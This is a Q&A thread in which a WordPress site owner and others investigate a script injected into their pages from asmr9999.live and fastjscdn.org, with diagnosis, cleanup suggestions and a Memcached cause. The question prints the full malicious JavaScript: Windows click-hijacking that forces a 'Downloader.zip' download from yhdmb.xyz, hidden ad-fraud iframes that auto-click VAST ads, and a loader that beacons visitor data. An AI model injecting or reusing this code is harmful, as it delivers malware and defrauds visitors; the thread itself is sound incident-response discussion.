# Malicious code asmr9999 / fastjscdn in Wordpress uses FileSaver.js and jszip

Tags: javascript, wordpress, malware

Scanning my site with pagespeed, it shows that my site is loading malicious files in the background.

**The problem happens occasionally**, it doesn't happen all the time. Sometimes the site doesn't load the malicious script, other times it does. I don't know what it depends on.

In particular, the following js script is loaded from this link "https:// asmr9999. live/static.js" (without space). So the malicious code is loaded indirectly.

```
if(!window.xxxyyyzzz){function e(){return -1!==["Win32","Win64","Windows","WinCE"].indexOf(window.navigator?.userAgentData?.platform||window.navigator.platform)}function n(n){if(!e())return!1;var t="File",a=n.target.closest("a");if(window.location.href.indexOf("3axis.co")>=0){if(0>a.parentElement.className.indexOf("post-subject")&&0>a.parentElement.className.indexOf("img"))return!1;t=a.children.length>0?a.children[0].alt:a.innerText}else{if(!(window.location.href.indexOf("thesimscatalog.com")>=0)||0>a.parentElement.className.indexOf("product-inner"))return!1;t=a.children[1].innerText}var i=document.createElement("a");return i.style="display:none",i.href="https://yhdmb.xyz/download/"+t+" Downloader.zip",document.body.append(i),i.click(),n.preventDefault(),!0}function t(e){var n=document.createElement("script");n.src=e,document.head.appendChild(n)}function a(e,n,t){var a="";if(t){var i=new Date;i.setTime(i.getTime()+36e5*t),a="; expires="+i.toUTCString()}document.cookie=e+"="+(n||"")+a+"; path=/"}function i(e){for(var n=e+"=",t=document.cookie.split(";"),a=0;a<t.length;a++){for(var i=t[a];" "==i.charAt(0);)i=i.substring(1,i.length);if(0==i.indexOf(n))return i.substring(n.length,i.length)}return null}function r(e){var t=e.target.closest("a");null!==t&&(n(e)||!i("__ads__opened")&&window._ads_goto&&(a("__ads__opened","1",6),"_blank"==t.target||(e.preventDefault(),window.open(t.href)),setTimeout(function(){window.location=window._ads_goto},500)),window.removeEventListener("click",r))}t("https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"),t("https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js"),window.addEventListener("click",r,{capture:!0}),window.addEventListener("message",function(e){e.data&&e.data instanceof Object&&e.data._ads_goto&&(window._ads_goto=e.data._ads_goto)}),window.xxxyyyzzz=function(e){var n=document.createElement("div"),t=document.createElement("iframe");t.src=e,n.style.display="none",n.appendChild(t),window.addEventListener("load",function(){document.body.append(n)})},window.xxxyyyzzz("https://yhdmb.xyz/vp/an.html")}
```

From this code it is possible to understand **where the malware is located on my Wordpress site**? And also is it possible to understand what exactly this code does?

I have seen that it also uses these scripts,

1. https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
2. https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js

which are respectively:

1. https://stuk.github.io/jszip/
2. https://github.com/eligrey/FileSaver.js/

[image]

**EDIT 1**: I find that it loads before "/body"

```
<script src="https://asmr9999.live/static.js?hash=a633f506a53746a846742c5655ebf596"></script></body></html>
```

**EDIT 2**: i installed https://wordpress.org/plugins/string-locator/ for search asmr9999 in all site, also in encoded Base64 format "YXNtcjk5OTk" but nothing. I tried also https://wordpress.org/plugins/gotmls/ , nothing.

**EDIT 3**: I've only found one person on the internet who has the same problem, at this link (remove space):

https:// boards.4channel. org/g/thread/89699524/i-had-a-virus-on-my-server-ot-attack-in-my-server

**EDIT 4**: i also analyzed the malicious link in the script, this https:// yhdmb. xyz/vp/an.html. It is an html page containing this code:

```
<html lang="en">
<head>
    <title>YHDM</title>
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8724126396282572"
     crossorigin="anonymous"></script>
    <script src="https://cdn.fluidplayer.com/v2/current/fluidplayer.min.js"></script>
</head>
<body>
<script>
    function setCookie(name,value,hours) {
        var expires = "";
        if (hours) {
            var date = new Date();
            date.setTime(date.getTime() + (hours*60*60*1000));
            expires = "; expires=" + date.toUTCString();
        }
        document.cookie = name + "=" + (value || "")  + expires + "; path=/;SameSite=None; Secure";
    }
    function addVast(id, url, prob, type) {
        var div = document.createElement('div');
        var video = document.createElement('video');
        var source = document.createElement('source');
        source.type = 'video/mp4';
        source.src = 'video.mp4';
        video.id = 'my-video' + id;
        video.append(source);
        div.appendChild(video);
        document.body.append(div);
        var testVideo = fluidPlayer(
            "my-video" + id,
            {
                layoutControls: {
                    autoPlay: true
                },
                vastOptions: {
                    "adList": [
                        {
                            "roll": "preRoll",
                            "vastTag": url
                        },
                        {
                            "roll": "midRoll",
                            "vastTag": url,
                            "timer": 8
                        },
                        {
                            "roll": "midRoll",
                            "vastTag": url,
                            "timer": 10
                        },
                        {
                            "roll": "postRoll",
                            "vastTag": url
                        }
                    ]
                }
            }
        );
        setTimeout(function () {
            testVideo.play();
            testVideo.setVolume(0);

            function tryClickAds() {
                setTimeout(function () {
                    if (testVideo.vastOptions && testVideo.vastOptions.clickthroughUrl) {
                        var url = testVideo.vastOptions.clickthroughUrl;
                        if (type == 'nw') {
                            setCookie('redirect', url, 1);
                            console.log(url);
                            window.parent.postMessage({'_ads_goto': window.location.href}, '*');
                        } else {
                            var adsIframe = document.createElement('iframe');
                            adsIframe.src = url;
                            adsIframe.style = 'height:100%;width:100%';
                            adsIframe.sandbox = 'allow-forms allow-orientation-lock allow-pointer-lock allow-presentation allow-same-origin allow-scripts';
                            document.body.appendChild(adsIframe);
                        }
                    } else {
                        tryClickAds()
                    }
                }, 1000)
            }

            if (Math.random() < prob) {
                tryClickAds()
            }
        }, 500);
    }

    addVast('1', 'https://wyglyvaso.com/ddmxF.ztdoG-N/v/ZxGmUY/bejmS9ku/ZdUll/klPpTRQG1iNozIcs2/NTTvAQtmNIDPUZ3YN/zXYP1LMWQI', 1, 'nw');
    addVast('2','https://syndication.exdynsrv.com/splash.php?idzone=4840778',0.5,'nw');
</script>
</body>
</html>
```

**EDIT 5**: i restored a backup from September. The malicious code is stille there, but little differente. It still load before "/body", but the js code is different and it uses another domanin, "fastjscdn .org", instead of "asmr9999 .live". How is it possible that it can change domain?

```
<script src="https://fastjscdn.org/static.js?hash=1791f07709c2e25e84d84a539f3eb034"></script></body>
```

JS code contain:

```
window.xxxyyyzzz||(window.xxxyyyzzz="1",function(){if(function t(){try{return window.self!==window.top}catch(r){return!0}}()){var t=window.parent.document.createElement("script");t.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(t);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{})}());
```

Comment: If you have access to the server you can search for those strings within your site directory. Do you have access to the server terminal, or only a control panel from your hosting company?

Comment: Slbox, i updated the post. Malicious js script is loaded from this link "https:// asmr9999. live/static.js" (without space). So the malicious code is loaded indirectly

Comment: i installed https://wordpress.org/plugins/string-locator/ for search asmr9999 in all site, but nothing.

Answer (score 0, accepted):

the problem and solution are described here https://stackoverflow.com/a/74921192/14686582

My Memcached server was public and infected with malicious code, it was a "cache-side" xss attack.

Answer (score 1):

You can find out who was initiator of any loaded file. Open developer console (`Ctrl+Shift+I` in Chrome), choose Network tab. After loading page with opened Network tab there will appear all loaded files. Locate your file and find Column initiator.

But, it can be scenario, where it will be loaded from  DOM. So next step will be you will go to Elements, `Ctrl+F` and search for this script. But this musn't be your solution. It can be inserted to HTML of your webpage by any malicious plugin.
I prefer (at least if you are able to log into Wordpress admin) using some useful plugin for scanning. E.g. plugin [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/) or some other scanning tool. It will probably find concrete file/directory where is some malicious code.

Comment: I find that it loads before </body>

....<script src="https:// asmr9999 .live/static.js?hash=a633f506a53746a846742c5655ebf596"></script></body></html>.....

Comment: i installed https://wordpress.org/plugins/string-locator/ for search asmr9999 in all site, but nothing

Comment: Try using Anti-Malware Security and Brute-Force Firewall , I think you will find the problem.

Comment: thank you Samuel, but nothing

Answer (score 1):

I have exactly the same issue on the ContOS VPS server and a custom CMS. I am using Apache + nginx + php 5.6 configuration. My investigations are the following:

1. I compared all my site scripts with the scripts from my previous backup and there are no changes in the site scripts!
2. I checked all files on my server for the string "asmr9999" and the same string, encoded in the Base64 format: YXNtcjk5OTk - the strings were not found. Also, I created a SQL database dump, but the dump either doesn't contains these strings!
3. I checked site with using the clamAV antivirus and the maldet tool and there is no issues were found.
4. Finally, I rebooted server, and the scripts "<script src="https:// asmr9999 .live" are gone from all my site pages! But, after about 1 hour, the scripts are appeared again on my site pages.

So, it seems that the script is located only in RAM and disappears during the server reboot. Then, after 1 hour maybe the crontab loaded the script into the RAM from some place.

I hope I will save your time and together we will resolve this issue.
I am continuing the investigation.

Comment: I have the new finding: Initaly a page have one or two scripts `<script src="https:// asmr9999 .live`, but during the time, the page contains more and more strings of this scripts, espechialy near the "a" tags.

Comment: finally someone who has the same problem, i've been searching the internet for days, nobody knows anything about it. I've updated the post with more information. The problem happens occasionally, it doesn't happen all the time. Sometimes the site doesn't load the malicious script, other times it does. I don't know what it depends on.

Comment: when you have time, please read the updated post. Also, can you list all installed plugins and the theme you are using? Let's compare...

Comment: Thank you for the update. As I wrote before, I have the custom CMS, not wordpress, but I see the same behaviour as yours. I have the mangooffice plugin, an email plugin and a sms plugin. Today I rebooted server and the script doesn't appear during 3 hours! In the other days it appears after 1 hour. Also, my hosting provider performs some maintains today. I am not sure it this coincidence or not. It is unusual that my hosting provider performs the maintains at the daylight time.

Comment: it seems that the problem is in the database, as said by MortenAM in another comment under this. However I haven't found anything in the database yet.

Comment: In my case, it has changed domain name, now is https:// fastjscdn .org/static.js. How is it possible that it can change domain? If it was an infected file, I don't think it would be possible to change the domain name... What do you think about it?

Comment: I am not sure that I understand your question correctly. I don't see nothing strange, that the attacker can change the malicious code on your site. If you have some backdoor/vulnerability on your site, the attacker can inject any malicious code on your site. It seems that the attacker has many domains with the js library, that loads on the hacked sites. Actually, your case it seems better than my due to you using the wordpress CMS, that supports by comunity. So, you may perform the following steps:
1. Create the full backup of the current site and remove all files on the server and database.

Comment: 2. To change all passwords.
3. Find the backup version without the malicious code.
4. Update the wordpress CMS and all plugins to the latest version.

Comment: 5. If it is needed, manually add posts which were added starting from the date of the backup creation. (You may unroll the infected version of the site under the local virtual machine for this.)

After these steps I think you will resolve the issue.

Comment: Regarding my case, I haven't the malicious code in the files or in the database. Actually, my database doesn't contains any scripts. The find of the "<script" does not return any results.
In my case, the malicious code was loaded in the RAM memory and modify the server responses. After the friday maintain works on the hosting, there is no malicious code on my site.

Comment: JFYI: May be it will be interesting for you. If you take a look on the domain name "fastjscdn.org", it contains Fast JS CND (Content Delivery Network). And there is the open source libruary https://github.com/hrichiksite/getjs "Free and Fast JS CDN, make a PR and add your files too!" As I understand "PR" it is the pull requests.

Comment: I think that the new domain is because it looks less suspicious

Comment: Do you have any news? On my site I see again the "<script src="https://fastjscdn.org/static.js?" injection on the pages.

Comment: No for now, same problem. Please tell me if you have any news about it

Comment: It seems the issue is in the ResponsiveFilemanager plugin. This plugin is used by the tinymce plugin. It seems you use the tinymce plugin too. Here is the example of code: dialog.php `<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.7.1/skin/blue.monday/jplayer.blue.monday.min.css" />`

Comment: Did you try to perform the 5 steps above?

Comment: I can't try all the steps because my oldest backup is 60 days old and still compromised. I scanned the site with Wordfence and it found some webp files, images, related to tinymce (i haven't used this plugin for years and deleted it years ago). I deleted all the files. I'll see what happens now

Comment: The main point to check if the  https://github.com/trippo/ResponsiveFilemanager plugin is present on your site. It seems this plugin contains some vulnerability.

Comment: i haven't this plugin, never had

Comment: I haven't seen the problem for a day, and you?

Comment: it reappeared, it's an obsession. Is it ever possible that in the whole internet there are no other people who have solved it?

Comment: I don't see the script on my site for 1 day. From time to time I reload my server and all scripts disappear.

Comment: when i purge the cache of W3 Total Cache, it disappeared, but after some hours or days, it reappeared

Comment: Yep, it seems the malicious code is located in RAM and changes content of the pages when the server generates it. When the wordpress generate pages, they are saved into the cache. As I wrote before, the script adds the code on the pages step by step. So, after the clean of the cache you don't see the script on the pages, but after time it will appear again. The main question for now, how the malicious code was loaded in the RAM and how it changes the content of the requested pages.

Comment: the problem persists. And for you?

Comment: On my site there is no problem. I don't see the malicious code on the pages.

Comment: the problem and solution are described here https://stackoverflow.com/a/74921192/14686582

My Memcached server was public and infected with malicious code, it was a "cache-side" xss attack.

Comment: Thank you very much for this information. For some reason, my last comment hasn't been published.

Answer (score 0):

Makes me think of linux rootkits from 10 years ago (!) such as Snakso that injected malicious iframes directly in the outgoing HTTP traffic of the server

Comment: This would be better as a comment than an answer.

Comment: Could be, but unfortunately I don't have enough reputation points to comment on existing answers :) To be constructive, my goal was to point out that as surprising as the issue seems to be and different from the usual plugins/themes infections, it actually matches with the behavior of existing rootkits from the past. As such, OP could try to apply the same detection techniques on the host.

Comment: thanks for the suggestion, but at the moment there are no malware on the server, also in RAM. On other sites of the same server, there isn't this malicious code.

Comment: do you have any result for these commands run as root? `$ ls -alR  --time-style=long-iso /proc/*/exe 2> /dev/null | grep deleted`, `$ grep packet_recvmsg /proc/*/stack`, `$ grep wait_for_more_packets /proc/*/stack`

Comment: i can't try, I should ask it to my hosting provider